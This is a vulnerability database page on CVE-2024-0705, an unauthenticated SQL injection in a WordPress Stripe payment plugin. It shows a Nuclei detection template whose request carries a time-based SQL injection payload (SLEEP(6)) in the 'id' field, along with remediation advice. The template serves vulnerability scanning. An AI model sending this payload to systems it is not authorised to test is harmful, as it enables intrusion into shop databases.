| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| Exploit for Missing Authorization in Themegrill Colormag | 19 Jan 202422:30 | – | githubexploit | |
| CVE-2024-0705 | 19 Jan 202411:26 | – | circl | |
| WordPress Plugin Stripe Payment Plugin for WooCommerce Security Vulnerability | 19 Jan 202400:00 | – | cnnvd | |
| CVE-2024-0705 | 19 Jan 202409:31 | – | cve | |
| CVE-2024-0705 Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection | 19 Jan 202409:31 | – | cvelist | |
| EUVD-2024-16495 | 3 Oct 202520:07 | – | euvd | |
| CVE-2024-0705 | 19 Jan 202410:15 | – | nvd | |
| CVE-2024-0705 | 19 Jan 202410:15 | – | osv | |
| WordPress Stripe Payment Gateway for WooCommerce Plugin <= 3.7.9 is vulnerable to SQL Injection | 19 Jan 202400:00 | – | patchstack | |
| Sql injection | 19 Jan 202410:15 | – | prion |
id: CVE-2024-0705
info:
name: Stripe Payment Plugin for WooCommerce <= 3.7.9 - Unauthenticated SQL Injection
author: Shivam Kamboj
severity: critical
description: |
Stripe Payment Plugin for WooCommerce for WordPress versions up to 3.7.9 contains a sql_injection caused by insufficient escaping and lack of preparation on 'id' parameter, letting unauthenticated attackers execute arbitrary SQL queries, exploit requires sending crafted 'id' parameter.
remediation: |
Update to the latest version of the plugin, above 3.7.9, to fix the vulnerability.
impact: |
Attackers can execute arbitrary SQL queries, potentially leading to data disclosure or modification of sensitive database information.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-0705
- https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve
metadata:
verified: true
max-request: 1
publicwww-query: "plugins/payment-gateway-stripe-and-woocommerce-integration/"
tags: cve,cve2024,wp-plugin,wp,wordpress,woocommerce,stripe,sqli,unauth,time-based
flow: http(1) && http(2)
http:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
host-redirects: true
max-redirects: 2
matchers:
- type: dsl
dsl:
- 'contains(body, "payment-gateway-stripe")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
@timeout: 10s
POST /?wc-api=wt_stripe HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"type":"charge.succeeded","data":{"object":{"id":"sqli_test' AND (SELECT 1 FROM (SELECT SLEEP(6))a)#","metadata":{"order_id":"999999"}}}}
matchers:
- type: dsl
dsl:
- 'duration >= 6'
- 'status_code == 200'
condition: and
# digest: 490a00463044022016a8f39a483086cb723a70472fc1b9e9e03c54f04f39acf8999ef20f420f33140220077b732ba43da08f8f739ae6a0f28c58e4c298a92cc0b1b34cd8584a3bd31b42:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation